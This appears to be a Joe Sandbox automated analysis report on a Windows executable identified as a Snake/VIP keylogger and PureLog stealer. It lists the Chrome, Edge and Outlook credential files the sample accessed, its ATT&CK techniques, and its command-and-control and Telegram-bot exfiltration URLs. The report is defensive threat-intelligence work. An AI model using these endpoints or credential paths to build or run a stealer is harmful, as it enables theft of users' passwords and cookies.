Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1708, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: C5JLkBS1CX.exe	Binary or memory string: WIN_81
Source: C5JLkBS1CX.exe	Binary or memory string: WIN_XP
Source: C5JLkBS1CX.exe	Binary or memory string: WIN_XPe
Source: C5JLkBS1CX.exe	Binary or memory string: WIN_VISTA
Source: C5JLkBS1CX.exe	Binary or memory string: WIN_7
Source: C5JLkBS1CX.exe	Binary or memory string: WIN_8
Source: C5JLkBS1CX.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4583666104.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1708, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4583666104.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1708, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1708, type: MEMORYSTR

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00656283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00656283
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00656747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00656747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	2 Valid Accounts	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C5JLkBS1CX.exe	91%	ReversingLabs	Win32.Spyware.Snakekeylogger
C5JLkBS1CX.exe	67%	Virustotal		Browse
C5JLkBS1CX.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://certs.starfieldtech.com/repository/1402	0%	Avira URL Cloud	safe
http://mail.starofseasmarine.com	0%	Avira URL Cloud	safe
https://certs.starfieldtech.com/repository/0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
mail.starofseasmarine.com	166.62.28.135	true	true	unknown
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:10:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 00000004.00000002.4582299740.000000000302F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000003020000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://certs.starfieldtech.com/repository/0	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581223186.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certificates.starfieldtech.com/repository/0	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20a	RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certs.starfieldtech.com/repository/1402	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581223186.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.starfieldtech.com/sfroot-g2.crl0L	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581223186.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.starfieldtech.com/08	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.starfieldtech.com/0;	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581223186.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lBjq	RegSvcs.exe, 00000004.00000002.4582299740.000000000302A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	false		high
http://go.mic	RegSvcs.exe, 00000004.00000002.4581223186.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.starfieldtech.com/0F	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.starfieldtech.com/sfig2s1-677.crl0c	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	RegSvcs.exe, 00000004.00000002.4582299740.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegSvcs.exe, 00000004.00000002.4582299740.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.starfieldtech.com/sfroot.crl0L	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.starofseasmarine.com	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certificates.starfieldtech.com/repository/sfig2.crt0	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlBjq	RegSvcs.exe, 00000004.00000002.4582299740.0000000002FF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000004.00000002.4582299740.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
166.62.28.135	mail.starofseasmarine.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588263
Start date and time:	2025-01-10 23:14:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	C5JLkBS1CX.exe renamed because original name is a hash value
Original Sample Name:	2caa04a44473cabb6298e6ce1c313beafb4a942641aed58ef247bb901f7ea314.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 56 Number of non-executed functions: 269
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:15:33	API Interceptor	10631381x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
166.62.28.135	ekeson and sons.exe	Get hash	malicious	FormBook	Browse	www.astrobalajichennai.com/eo5u/?3flLi=3fixF&WDH4Z=ZNZ/xCb0AByMrT84YN+VaRUJuS/eLDsmfKlk5YP3EjsgSpc8R3rmuTDGRlyYjyOH7itkGMLpMQ==
193.122.130.0	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

